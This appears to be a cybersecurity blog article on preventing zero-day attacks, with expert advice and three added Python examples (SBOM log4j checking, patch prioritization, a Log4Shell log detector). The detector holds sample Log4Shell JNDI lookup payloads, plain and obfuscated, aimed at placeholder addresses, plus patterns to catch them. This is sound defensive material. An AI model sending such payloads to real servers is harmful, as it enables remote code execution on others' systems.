
5 Security Experts Share Best Practices to Prevent Zero-Day Attacks

January 31, 2023


Imagine you accidentally leave a rarely-used window open in your home.

You don’t think anything of it until you notice things going missing. Thieves have been sneaking in and out of your house for days, availing themselves of your stuff using that neglected window. 

Zero-day attacks are exactly the same. Hackers find and exploit a vulnerability in your system before you know it exists. And until you find the bug, you can’t fix the problem. 

Today, zero-day vulnerabilities are regularly found in everyday platforms such as Apple iOS, Google Chrome, and Windows. The growth of cybercrime, and the steady stream of new variants of already known exploits, is making zero-day attacks increasingly hard to mitigate.

For enterprises facing cybersecurity threats from zero-day attacks, the situation paints a grim picture. It feels as if there’s no hope of finding and preventing these kinds of attacks.

But experts note that it’s not always the case. Using the right security software and implementing best cybersecurity practices can guard against zero-day attacks. Keep reading to find out how.

What is a zero-day attack? 

Software developers don’t want to create software with bugs, obviously, but every piece of software has unintentional flaws. Industry estimates put the figure at 3 to 20 bugs per 1,000 lines of code. Some of these bugs create a security weakness in the design, implementation, or operation of a system or application.

Cybercriminals look for these kinds of vulnerabilities to execute commands under the guise of legitimate system activity. They can access and steal restricted data, impersonate another user, or launch denial-of-service attacks. For instance, a vulnerability in a cloud storage service might expose data that is otherwise locked down.

What is zero-day vulnerability?

A zero-day vulnerability is a software flaw that has not been fixed because the party responsible for fixing it does not yet know it exists, or knows but has not yet shipped a patch.

Software vendors, developers, and programmers are always scanning for bugs like these. When they discover one, they patch it up. However, when the vulnerability is out in the open and unfixed, cybercriminals get a free pass to exploit it.

Since vendors typically have no knowledge of such vulnerabilities beforehand, they literally have zero days to fix the bug before cybercriminals leverage it. 

250

zero-day vulnerabilities have been found in the wild by Google’s Project Zero researchers since 2014.

Source: Google's Project Zero

Researchers Leyla Bilge and Tudor Dumitras have outlined the seven stages in the lifecycle of a zero-day vulnerability. 

  1. Vulnerability introduced. Software ships with a bug. It might be a coding mistake, missing encryption, or anything else that lets unauthorized people into the system.
  2. Exploit released in the wild. Attackers find the bug, write exploit code or a malicious payload, and use it to conduct attacks. At this point nobody else knows the flaw exists.
  3. Vendor discovers the vulnerability. The vendor or the party responsible for the software learns of the bug, through its own testing, a third-party researcher, or evidence of attacks, and starts working on a patch.
  4. Vulnerability disclosed publicly. The vendor or affected parties publish information about the bug, which usually receives a Common Vulnerabilities and Exposures (CVE) identifier for easy reference. Some vulnerabilities are never announced and are patched quietly.
  5. Anti-virus signatures released. Once the vulnerability is known, security vendors analyze the exploits and malware built on it, derive detection signatures, and push them to their scanning and detection products.
  6. Patch released. Meanwhile, the software vendor releases a patch. Systems that install it are no longer exposed to this vulnerability.
  7. Patch deployment complete. Only once every affected system has been patched is the vulnerability closed. Until then, unpatched systems remain exposed, and the public disclosure makes them easier to find.

Zero-day vulnerability vs. zero-day exploit vs. zero-day attack

It’s common to confuse zero-day attacks with zero-day vulnerabilities and zero-day exploits. But they are different. 

difference between zero-day vulnerability, zero-day exploit and zero-day attack

Zero-day vulnerability: A software vulnerability yet to be known to developers or a flaw with no patch. Zero-day vulnerabilities could be missing data encryption, misconfigurations, incorrect authorizations, or coding errors.

Zero-day exploit: The technique or code cybercriminals use to gain access to a system through a zero-day vulnerability. It is typically delivered by spear phishing, malicious web pages, or malware.

Zero-day attack: A successful zero-day exploit that sabotages a system or causes damage in terms of data breach or theft is a zero-day attack. 


How does a zero-day attack work? 

Your defense against zero-day attacks is effective only if you know how an attack works. A zero-day attack goes like this:

  1. Discover vulnerabilities. Attackers look for critical vulnerabilities in popular platforms. They also buy zero-day vulnerabilities on the black market, where zero-day bugs and exploits fetch high prices.
  2. Create the exploit code. Hackers write exploit code that takes advantage of the zero-day vulnerability. The exploit usually carries only a small first-stage payload, which downloads additional malware once it runs. That malware lets the attackers infect vulnerable devices, execute code, act as an administrator, or perform other damaging actions.
  3. Find vulnerable systems. Criminals scan for systems vulnerable to the exploit using bots or automated scanners, then plan a targeted or mass attack depending on their motives.
  4. Deploy the exploit. The most common distribution tactic is through web pages that unknowingly serve malicious code via compromised ads. Exploits are also delivered by email, either as spear phishing aimed at specific individuals or as mass phishing sent to a large group of people.

    The attacker's malware is downloaded when a user visits the malicious page or acts on the phishing email. Attackers also use exploit kits, collections of exploits that target many different software vulnerabilities from a single web page. Exploit kits target operating systems, applications, web browsers, open-source components, hardware, and IoT devices.
  5. Launch the exploit. Once the exploit runs, criminals are inside the system and can compromise the operations and data of the device, or even the entire connected network.

    Hackers use exploits to steal data, launch ransomware, or conduct supply chain attacks. In a supply chain attack, attackers break into a software provider, whether through a zero-day vulnerability or another weakness, and hide additional malware in the provider's product without the vendor's knowledge. The malicious code then ships alongside the legitimate code when the software is released to customers, producing a large number of victims.

    The 2020 SolarWinds Orion incident is the best-known example. Rather than exploiting a bug in Orion itself, the attackers compromised SolarWinds' build environment and inserted a backdoor into signed Orion updates, which were then distributed to customers and used to target hundreds of businesses and government agencies.

Who executes zero-day attacks?

Different kinds of people carry out zero-day attacks for varying reasons. They could be:

  • Cybercriminals, who do it for monetary gain. A study found that a third of all hacking groups exploiting zero-day vulnerabilities are financially motivated.
  • State-sponsored hackers, who do it for political reasons or to attack another country’s cyberinfrastructure. For instance, the Chinese state-sponsored threat group APT41 used a zero-day vulnerability to target a U.S. state government network in 2021.
  • Hacktivists, who do it for social or political causes.
  • Corporate spies, who do it to surveil competing businesses.

Targets of zero-day exploits and zero-day attacks

Cybercriminals target a wide range of organizations with zero-day exploits and attacks. These include:

  • Government agencies
  • Critical public infrastructure
  • Companies ranging from small and medium-sized businesses to large enterprises in different industries like IT, finance, media, and healthcare
  • Software-as-a-service (SaaS) vendors, managed service providers (MSPs), and cloud solutions providers
  • High-profile individuals
  • Academics, think tanks, universities, activists, and NGOs

Why are zero-day attacks dangerous?

Zero-day attacks are one of the fastest-growing cybersecurity threats. With the rapid adoption of cloud, mobile, and internet-of-things (IoT) technologies, the number and complexity of software platforms we use daily are increasing. More software leads to more software bugs. More bugs typically mean more gateways for attackers to exploit.

For criminal hackers, the vulnerabilities in popular software like Microsoft Office or Google Chrome represent a free pass to attack any target they want, from Fortune 500 companies to millions of mobile phone users worldwide.

Zero-day attacks are so dangerous because they typically go undiscovered for at least ten months, and sometimes much longer. Until the attack is found, the software remains unpatched, and anti-virus products cannot detect the attack with signature-based scanning. Such attacks are also unlikely to be observed in honeypots or lab experiments.

Even after a vulnerability is disclosed, criminals rush to take advantage of the situation. Once an unpatched vulnerability is public, it takes only 14 days for an exploit to appear in the wild. An attack may initially target a specific organization or person, but it doesn’t take long for other threat actors to exploit the vulnerability as widely as they can.

830,000

attack attempts were recorded within 72 hours of the public disclosure of the Log4Shell vulnerability in Apache Log4j.

Source: Check Point

Until a few years ago, zero-day exploits were mostly found and used by state-sponsored groups. Stuxnet, the famous attack on Iran’s nuclear program that relied on several Windows zero-day exploits, is widely believed to have been a joint operation between the United States and Israel.

But today, financially motivated cybercrime groups use zero-day exploits too, and they monetize them through ransomware. Attacks on the IT services supply chain are also increasing, with the objective of reaching the downstream businesses that depend on those services.

5.4 million

Twitter accounts were found to be affected by a data breach due to a zero-day vulnerability in 2022.

Source: Twitter

Adding to the mix is that hackers could potentially use artificial intelligence (AI) and machine learning (ML) solutions to instigate sophisticated attacks.

For instance, in 2022, researchers found they could use ChatGPT to produce phishing emails and ransomware for macOS. Anyone, regardless of technical expertise, could use such AI tools to generate malware or ransomware code on demand.

These attacks have wide ramifications, from data theft and spreading malware to financial losses and total system takeover. More than ever, businesses have to be prepared for zero-day attacks to protect their data and network security.


5 experts reveal common missteps in defense against zero-day attacks

We asked five cybersecurity experts about the most prevalent and avoidable missteps businesses take that make them vulnerable to zero-day threats and attacks. Here’s what they said.

Insufficient preparation

Pete Nicoletti from Check Point Software noted that businesses, especially small-to-midsize, aren’t usually ready for zero-day attacks.

“Let’s look at the scope of the problem first. Vulnerable applications, partners, employees distributed everywhere, in cloud resources, colocation servers, desktops, laptops, insecure home wireless, bring-your-own-device, cell phones, and more. All create a very large threat surface and require specific solutions, priority, budget, and personal attention,” Nicoletti said.

He noted that attackers are well funded, with billions of dollars in ransomware proceeds, and are now producing thousands of new malware variants each month along with billions of well-crafted phishing emails. They exploit zero-day vulnerabilities and hammer on unpatched weak spots.

“Even some security vendors have zero days and are being leveraged as an exploitation vector, turning up the irony dial to the max.”

Pete Nicoletti
Field CISO, Check Point Software

Considering how expensive and hard zero-day attacks are to mitigate, Nicoletti insists businesses should be ready to address the security risks with reasonable expenditures.

Unrepaired known vulnerabilities

Paul Hadjy, the CEO and co-founder of Horangi Cyber Security, talked about the importance of getting the basics of security right.

“Many companies ask us about dealing with zero-day vulnerabilities when they still have not fully matured their capabilities and mechanisms for dealing with known vulnerabilities,” Hadjy said.

He told us that while it’s unfortunate to get attacked on a zero-day vulnerability, getting attacked on a known vulnerability is even worse.

“Both point to a situation we come across very often. The situation where organizations are focusing on what is trendy and relevant when they should be focusing on the basics of security,” he said.

“Basic security capabilities should not be overlooked for something that is new and shiny.”

Paul Hadjy
CEO and Co-founder, Horangi Cyber Security

Poor management practices

Caitlin Condon, senior manager of Security Research at Rapid7, noted that many companies lack a basic, foundational vulnerability management practice.

“The most frequent question we hear organizations asking when there's a high-profile zero-day attack is, ‘do we use this vulnerable product?’ followed by ‘have we already been exploited?’” Condon said.

“A crisis is not an ideal time for a business to start thinking about how to catalog inventory, set up centralized logging or alerting, or implement an emergency patching plan for critical, actively exploited vulnerabilities.”

Caitlin Condon
Senior Manager, Security Research, Rapid7

Condon said that the best preparation against zero days is to put good core policies and practices in place. “Then, when there's a cybersecurity incident where risk reduction is measured in minutes, you have a well-understood baseline on top of which to enact emergency procedures, operationalize intelligence, and prioritize remediations.”

Lack of visibility

Stan Wisseman, chief security strategist of CyberRes, a Micro Focus line of business, highlighted the need for better visibility into the software businesses use.

“Organizations need greater transparency into the software components that make up their applications and products so they can conduct rapid impact analysis,” Wisseman said. He illustrated the point with the attacks that followed the disclosure of Log4Shell, the vulnerability in the Apache Log4j logging library.

“With Log4J, anybody running anything with Java had to manually email their vendors to figure out if Log4J was in their products and validate the version. If they were affected, they had to determine what to do about it. Everyone was scrambling.”

He added that businesses need software composition analysis (SCA) and a software bill of materials (SBOM) to quickly reduce the risk a zero-day attack poses. “You need to do your due diligence and ensure they have validated security controls in place,” he said.

“The value of software composition analysis (SCA) and having software bill of materials (SBOMs) available is that you can respond quickly to mitigate risks posed by the zero-day attack.”

Stan Wisseman
Chief Security Strategist, CyberRes
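The impact analysis Wisseman describes, and Condon’s “do we use this vulnerable product?” question, become a query the moment you have an SBOM per product. The following is an added example written for this article, not code from the article, from CyberRes, Rapid7, or the CycloneDX project. It walks CycloneDX JSON SBOMs (constructed here for four hypothetical products) and reports every log4j-core component that falls in the Log4Shell (CVE-2021-44228) version range, including one buried as a transitive dependency inside a vendor component. The range rule is an assumption based on the Apache advisory as I recall it (2.0-beta9 up to but not including 2.15.0, minus the 2.3.1 and 2.12.2 security backports and their successors) and should be checked against the current advisory before use.

```python
"""SBOM-driven impact analysis for Log4Shell (added example; SBOMs are constructed)."""
import json
import re

# Assumed rule for CVE-2021-44228 (verify against the current Apache Log4j advisory):
# org.apache.logging.log4j:log4j-core from 2.0-beta9 up to, but not including, 2.15.0,
# except the security backports on the 2.3.x (>= 2.3.1) and 2.12.x (>= 2.12.2) branches.
AFFECTED_GROUP = "org.apache.logging.log4j"
AFFECTED_NAME = "log4j-core"
AFFECTED_MIN = "2.0-beta9"
AFFECTED_MAX_EXCLUSIVE = "2.15.0"

_VERSION_RE = re.compile(r"^(\d+(?:\.\d+)*)(?:-([A-Za-z]+)(\d*))?$")


def parse_version(text):
    """Turn '2.14.1' or '2.0-beta9' into a comparable tuple.

    Numeric parts are padded to three places; a pre-release tag sorts below the
    release it precedes, so 2.0-beta9 < 2.0 < 2.0.1.
    """
    m = _VERSION_RE.match(text.strip())
    if not m:
        raise ValueError(f"unparseable version: {text!r}")
    nums = tuple(int(p) for p in m.group(1).split("."))
    nums = (nums + (0, 0, 0))[:3]
    if m.group(2):                      # pre-release: (major, minor, patch, 0, n)
        return nums + (0, int(m.group(3) or 0))
    return nums + (1, 0)                # release:     (major, minor, patch, 1, 0)


def is_affected(component):
    """True if the component is a log4j-core build inside the vulnerable range."""
    if component.get("group") != AFFECTED_GROUP or component.get("name") != AFFECTED_NAME:
        return False
    v = parse_version(component.get("version", ""))
    if not parse_version(AFFECTED_MIN) <= v < parse_version(AFFECTED_MAX_EXCLUSIVE):
        return False
    branch, patch = v[:2], v[2]
    backport_fixed = (branch == (2, 3) and patch >= 1) or (branch == (2, 12) and patch >= 2)
    return not backport_fixed


def iter_components(node, path=()):
    """Yield (component, path) for every component, including nested ones.

    CycloneDX lets a component carry its own 'components' list, which is where a
    transitive dependency such as a logging library pulled in by a third-party
    engine tends to hide.
    """
    for comp in node.get("components", []):
        label = f"{comp.get('group', '')}:{comp.get('name', '')}@{comp.get('version', '?')}"
        here = path + (label,)
        yield comp, here
        yield from iter_components(comp, here)


def find_affected(sbom):
    """Return the affected components of one SBOM with the dependency path to each."""
    return [
        {"version": comp["version"], "path": " -> ".join(path)}
        for comp, path in iter_components(sbom)
        if is_affected(comp)
    ]


def assess_products(sboms_by_product):
    """Map product name -> affected components (an empty list means clean)."""
    return {name: find_affected(json.loads(doc)) for name, doc in sboms_by_product.items()}


def _lib(group, name, version, **extra):
    return {"type": "library", "group": group, "name": name, "version": version, **extra}


# Constructed SBOMs for four hypothetical products (not real inventory data).
SBOMS = {
    "billing-service": json.dumps({"bomFormat": "CycloneDX", "specVersion": "1.4", "components": [
        _lib(AFFECTED_GROUP, "log4j-api", "2.14.1"),            # the API jar alone is not affected
        _lib("com.example", "report-engine", "3.2.0",           # hypothetical vendor component
             components=[_lib(AFFECTED_GROUP, "log4j-core", "2.14.1")]),  # transitive, hidden
    ]}),
    "legacy-portal": json.dumps({"bomFormat": "CycloneDX", "specVersion": "1.4", "components": [
        _lib(AFFECTED_GROUP, "log4j-core", "2.12.2"),           # Java 7 security backport
    ]}),
    "auth-gateway": json.dumps({"bomFormat": "CycloneDX", "specVersion": "1.4", "components": [
        _lib(AFFECTED_GROUP, "log4j-core", "2.17.1"),
    ]}),
    "batch-runner": json.dumps({"bomFormat": "CycloneDX", "specVersion": "1.4", "components": [
        _lib(AFFECTED_GROUP, "log4j-core", "2.0-beta9"),        # oldest affected build
    ]}),
}

if __name__ == "__main__":
    for product, hits in assess_products(SBOMS).items():
        print(f"{product:16} {'AFFECTED' if hits else 'clean'}")
        for hit in hits:
            print(f"    {hit['path']}")
```

Run against real SBOMs, the dependency path in each finding is what tells you whether you can fix the component yourself or must wait on the vendor that shipped it, which is exactly the distinction Wisseman’s “email every vendor” scramble was trying to make by hand.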

Neglected security and compliance

Ben Herzberg, Vice-President at Satori Cyber, shared his takes on the problems new businesses have with preventing zero-day attacks.

“New businesses are, generically speaking, in growth mode. And lean. These two factors can cause neglect of security and compliance. This can lead to more excessive security risks, both known and zero-day.”

Zero-day attack prevention: How to prevent zero-day threats

Now that you know where some of the problems lie, peruse expert advice about preventing zero-day attacks.

1. Understand your risks

Condon highlighted the importance of businesses understanding the dangers cyber attacks pose.

“With limited resources to secure an ever-expanding list of IT infrastructure and cloud services, it's important to build a security program that takes your specific risk context into account.”

Caitlin Condon
Senior Manager, Security Research, Rapid7

“Maybe you're a cloud-first company that needs to tailor its deployment and scanning rules to prevent misconfigurations that expose data or run up high bills,” she said. “Maybe you're a retail company whose point-of-sale (POS) systems are targeted during the holiday season or a streaming company living in a 99.999% uptime world where denial-of-service attacks are a business catastrophe."

“Understanding which types of risks have the highest impact on your business allows you to build a security program where goals and metrics are customized to your needs and where you can more easily communicate progress and priorities to non-security stakeholders across your organization.”

Adding to this, Herzberg stressed the importance of building an incremental plan that addresses threats by risk factor.

“You will probably not be able to lower your risk to 0%. It is, therefore, important to prioritize high-risk areas...Building great security around the sensitive data you have is more important than that of generic log data.”

Ben Herzberg
Vice-President, Satori Cyber

2. Get your basics right

“Businesses need to get their basics covered first,” said Nicoletti.

Here are some suggestions from Nicoletti for businesses to get their basics right.

  • Meet every cybersecurity compliance requirement of a rigorous framework such as the Payment Card Industry Data Security Standard (PCI DSS).
  • Ensure you have a robust backup system and restoration strategy. Test them routinely.
  • Adopt a zero-trust strategy and give your employees and partners appropriate access levels.
  • Monitor your cloud, containers, and servers with continuous posture assessment to prevent misconfigurations.
  • Use the best email security you can find.
  • Find an appropriate managed security service provider (MSSP) if you don’t have enough experts to watch and respond 24/7.

Adding to this, Wisseman pointed out that the advice provided by the Cybersecurity and Infrastructure Security Agency (CISA) in its Shields Up program is great for companies of all sizes that want to improve their resilience.

3. Set up multiple layers of security

“It is important to make sure that there are multiple layers of security,” Herzberg said. “For example, if an endpoint is compromised, which may be as a result of a zero-day exploit that’s out of your control, think about how you make sure the damage is contained and will not lead to compromising all your platforms.” The point of a layered approach is that an attacker who gets past one defense still has to get past the next, which limits how far a single zero-day can take them.

Tip: Put a web application firewall (WAF) in front of your web applications to inspect incoming HTTP traffic and block known attack patterns in real time. A WAF only sees web traffic, so treat it as one layer rather than the whole defense.

4. Get incident response and patch management capabilities

Hadjy called these capabilities “foundational,” and went on to say, “Many technologies, such as using a cloud security posture management tool and cloud identities and entitlements management (CIEM), can help you improve your patch management capabilities and are highly recommended.”

G2 cybersecurity analyst Sarah Wallace also called attention to the importance of having updated cybersecurity software. “Cyber criminals know a lot of organizations have dated, legacy security software so it's an easy target for them,” said Wallace.

Related: Learn how to make security incident response less chaotic with an incident response plan.

5. Hold simulations and test

Hadjy emphasized improving incident response strategy with frequent simulations and tests. “Have a solid plan in place, and practice, practice, practice!”

Hadjy explained to us that holding simulations such as tabletop exercises is the best way to see how well your incident response plans work and to identify areas of improvement.

“You may not be able to control when or how you get attacked, but you can control many parts of your response when it happens,” he said. He also stressed the need to cultivate and promote a strong cybersecurity culture.

“Dealing with a zero-day attack is, in almost every way, the same as dealing with any other cyber attack. You have to respond to a situation you did not expect, and you often have very little information to go on.”

Paul Hadjy
CEO & Co-founder, Horangi Cyber Security

“Ensure that your entire organization is educated and stays vigilant against potential threats like phishing. Provide tools and channels for employees to flag and report phishing attempts and threats,” Hadjy said.

“If employees learn from day one that security is not an obstacle that needs to be bypassed, but a business enabler, it makes a huge difference in their behavior for the years to come,” said Herzberg.

To conclude, Nicoletti left us with this guidance. “Change your mindset from detection to prevention as you must stop zero days in their tracks.”

Security solutions against zero-day attacks

Different security solutions help detect and defend against zero-day threats and other cyber security vulnerabilities and attacks. You can use a combination of these tools based on your needs and strengthen your business’s security posture.

Patch management software

Patch management solutions ensure your tech stack and IT infrastructure are up to date. Organizations utilize this tool to

  • Keep a database of software, middleware, and hardware updates.
  • Get alerts on new updates or to auto-update.
  • Notify admins of out-of-date software usage.

Tip: Vulnerability scanners and black-box scanners find known vulnerabilities in your systems so you can fix them before they are exploited.

Risk-based vulnerability management software

More advanced than traditional vulnerability management tools, risk-based vulnerability management software identifies and prioritizes vulnerabilities based on customizable risk factors. Companies can use this tool to

  • Analyze applications, networks, and cloud services for vulnerabilities.
  • Prioritize vulnerabilities based on risk factors using ML.

 

Tools like attack surface management software can also be used to scan for and remediate vulnerabilities.
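Herzberg’s advice to prioritize high-risk areas first, and the risk-based scoring this category of tool performs, come down to ranking the same CVSS number differently depending on where the flaw sits. The following is an added illustration, not the article’s content and not any vendor’s scoring model: the weights, the assets, and every identifier other than CVE-2021-44228 are constructed assumptions. It shows a CVSS 6.5 flaw that is being exploited on an internet-facing host outranking a CVSS 9.8 flaw on an isolated replica, and it separates “patch now” from “mitigate, there is no patch yet”, which is the zero-day case.

```python
"""Risk-based vulnerability prioritization (added example; weights and data are assumed)."""
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    asset: str
    vuln_id: str            # CVE id, or a hypothetical "H-n" label in the sample data
    cvss: float             # CVSS base score, 0.0-10.0
    known_exploited: bool   # seen in the wild, e.g. listed in a KEV-style catalog
    internet_facing: bool   # reachable from outside the network
    data_sensitivity: int   # 1 = public or log data ... 3 = regulated or customer data
    patch_available: bool   # False is the zero-day situation: nothing to install yet


def risk_score(f):
    """Assumed weighting: severity is the baseline, evidence of exploitation and
    exposure multiply it, and the sensitivity of the data at stake adds to it."""
    score = f.cvss
    if f.known_exploited:
        score *= 2.0
    if f.internet_facing:
        score *= 1.5
    score += 2.0 * (f.data_sensitivity - 1)
    return round(score, 2)


def remediation_action(f):
    """What the queue entry asks the team to do."""
    if not f.patch_available:
        return "mitigate"           # isolate, virtual-patch at the WAF, disable the feature, monitor
    if f.known_exploited or (f.internet_facing and f.cvss >= 7.0):
        return "emergency patch"
    return "scheduled patch"


def prioritize(findings):
    """Highest risk first; ties broken by asset and id so the order is stable."""
    return sorted(findings, key=lambda f: (-risk_score(f), f.asset, f.vuln_id))


def build_queue(findings):
    """Ordered work list of (asset, vuln_id, score, action)."""
    return [(f.asset, f.vuln_id, risk_score(f), remediation_action(f)) for f in prioritize(findings)]


# Constructed sample: one real CVE (Log4Shell) and four hypothetical findings.
SAMPLE = [
    Finding("db-replica-internal", "H-1", 9.8, False, False, 3, True),
    Finding("marketing-site", "H-2", 6.5, True, True, 1, True),
    Finding("pos-gateway", "CVE-2021-44228", 10.0, True, True, 3, True),
    Finding("vendor-appliance", "H-3", 7.5, True, True, 2, False),   # exploited, no patch yet
    Finding("log-archive", "H-4", 7.2, False, False, 1, True),
]

if __name__ == "__main__":
    for asset, vuln_id, score, action in build_queue(SAMPLE):
        print(f"{score:6.2f}  {asset:20} {vuln_id:16} {action}")
```

The useful property is that the unpatched, actively exploited appliance lands near the top of the queue with an action the team can actually take, instead of disappearing because “no patch available” filters it out of a patch-centric report.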

Security risk analysis software

Security risk analysis software monitors IT stacks, including networks, applications, and infrastructure, to identify vulnerabilities. Businesses use this solution to

  • Analyze a company’s security software, hardware, and operations.
  • Get information on vulnerabilities or holes in their security.
  • Get recommendations to optimize security planning across IT systems.

Intrusion detection and prevention systems are also useful for knowing about suspicious activities, malware, socially engineered attacks, and other web-based threats.

Threat intelligence software

Threat intelligence software provides information on the newest cyber threats, be it zero-day attacks, new malware, or exploits. Organizations use threat intelligence software to

  • Get information on emerging threats and vulnerabilities.
  • Find out remediation practices for emerging threats.
  • Assess threats on different network and device types.

Security information and event management (SIEM) software

SIEM combines the functions of security information management (SIM) and security event management (SEM) software. It provides a single platform for real-time security log analysis, investigation, anomaly detection, and threat remediation. Businesses use SIEM to

  • Collect and store IT security data.
  • Monitor for incidents and abnormalities in the IT system.
  • Gather threat intelligence.
  • Automate threat response.
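As a concrete instance of the real-time log analysis a SIEM rule performs, here is an added example written for this article, not a rule from any SIEM vendor and not code from the article. It scans web server access logs (constructed lines below, using documentation-reserved addresses) for the Log4Shell JNDI lookup strings that made up the attack attempts counted earlier, including the lightly obfuscated forms such as ${${lower:j}ndi:...} and URL-encoded payloads that defeat a naive substring match. The obfuscation forms handled are the publicly reported ones; a production rule would need to keep up with new variants.

```python
"""Detection of Log4Shell-style JNDI lookups in web access logs (added example; logs are constructed)."""
import re
from urllib.parse import unquote

# Apache/nginx "combined" log format: ip ident user [time] "request" status bytes "referer" "user-agent"
_LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) \S+ '
    r'"(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Lookup forms attackers used to hide the literal "jndi": ${lower:j}, ${upper:N},
# ${::-j}, ${env:NO_SUCH_VAR:-j}. Each resolves to the character(s) it wraps,
# so we resolve them the same way before matching.
_INDIRECT_RE = re.compile(r"\$\{(?:lower|upper):([^}])\}|\$\{[^}]*?:-([^}]*)\}", re.IGNORECASE)

# The lookup itself: ${jndi:<scheme>:...} with the schemes seen in the wild.
_JNDI_RE = re.compile(r"\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns|iiop|corba|nds|http)\s*:", re.IGNORECASE)


def normalize(text, rounds=3):
    """URL-decode and unwrap indirection lookups until the text stops changing.

    The round limit keeps a hostile input from making the rule loop forever.
    """
    for _ in range(rounds):
        new = _INDIRECT_RE.sub(lambda m: m.group(1) if m.group(1) is not None else m.group(2),
                               unquote(text))
        if new == text:
            break
        text = new
    return text


def detect(line):
    """Return a finding dict for one log line, or None if it looks clean."""
    m = _LOG_RE.match(line)
    if not m:
        return None                      # unparseable line: route to a parse-failure counter
    for field in ("req", "ref", "ua"):   # payloads appear in paths, referers and user agents
        norm = normalize(m.group(field))
        hit = _JNDI_RE.search(norm)
        if hit:
            return {"src": m.group("ip"), "field": field, "scheme": hit.group(1).lower(),
                    "normalized": norm}
    return None


def scan(lines):
    """All findings for a batch of lines, in input order."""
    return [d for d in (detect(line) for line in lines) if d]


# Constructed sample lines (RFC 5737 addresses; no real infrastructure).
SAMPLE_LOGS = [
    # plain payload in the User-Agent header
    '198.51.100.7 - - [10/Dec/2021:14:03:21 +0000] "GET / HTTP/1.1" 200 612 "-" '
    '"${jndi:ldap://198.51.100.7:1389/a}"',
    # obfuscated and partially URL-encoded payload in the query string
    '203.0.113.9 - - [10/Dec/2021:14:05:02 +0000] '
    '"GET /search?q=%24%7B${lower:j}${upper:n}${::-d}${env:NOPE:-i}:ldap://203.0.113.50/x%7D HTTP/1.1" '
    '404 153 "-" "curl/7.79.1"',
    # benign traffic, including a template placeholder that is not a JNDI lookup
    '192.0.2.44 - - [10/Dec/2021:14:06:10 +0000] "GET /docs?tpl=${name} HTTP/1.1" 200 8120 '
    '"https://example.com/" "Mozilla/5.0"',
    "garbage line that does not parse",
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOGS):
        print(f"{finding['src']:14} {finding['field']:4} {finding['scheme']:5} {finding['normalized']}")
```

The normalization step is the part worth copying into any rule of this kind: matching the raw line would catch the first sample and miss the second, and the attackers of December 2021 switched to the obfuscated form within hours for exactly that reason.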

Incident Response software

Incident response tools are usually the last line of defense against a cyber threat. They are used to remediate security issues as they arise, in real time. Businesses use the solution to

  • Monitor and detect anomalies in IT systems.
  • Automate, or guide the security team through, the remediation process.
  • Store incident data for analytics and reporting.

Security orchestration, automation, and response (SOAR)  software

SOAR combines the functionalities of vulnerability management, SIEM, and incident response tools. Organizations use the solution to

  • Integrate security information and incident response tools.
  • Build security response workflows.
  • Automate tasks related to incident management and response.

Shields up

Zero-day attacks are, no doubt, increasingly common and difficult to prevent. But you must still mount your best defense against them. Know the tech stack you have. Maintain a robust security infrastructure for finding and fixing vulnerabilities.

Keep monitoring for anomalies. Make employees aware of your security policies and the threats they face. Have an incident response plan, and test it regularly. Mitigate and contain an attack if it happens. Follow the best practices above with the security solutions mentioned, and you’ll be prepared.


